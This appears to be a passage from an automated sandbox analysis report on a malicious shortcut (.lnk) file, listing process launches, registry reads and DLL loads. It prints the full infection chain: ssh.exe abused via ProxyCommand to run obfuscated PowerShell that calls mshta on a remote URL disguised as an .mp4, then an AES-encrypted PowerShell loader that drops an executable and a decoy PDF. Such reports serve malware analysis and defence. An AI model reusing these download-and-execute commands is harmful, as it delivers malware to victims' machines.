Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zs4ovgr.iko.ps1Jump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\bdd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: tz1WicW6sG.lnkVirustotal: Detection: 41%
Source: tz1WicW6sG.lnkReversingLabs: Detection: 36%
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)" .
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://static.klipxuhaq.shop/BUX6P.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Mcyga.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1636,i,16971974731040097592,9100869512474091707,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\bdd.exe "C:\Users\user\AppData\Roaming\bdd.exe"
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://static.klipxuhaq.shop/BUX6P.mp4"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Mcyga.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\bdd.exe "C:\Users\user\AppData\Roaming\bdd.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1636,i,16971974731040097592,9100869512474091707,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
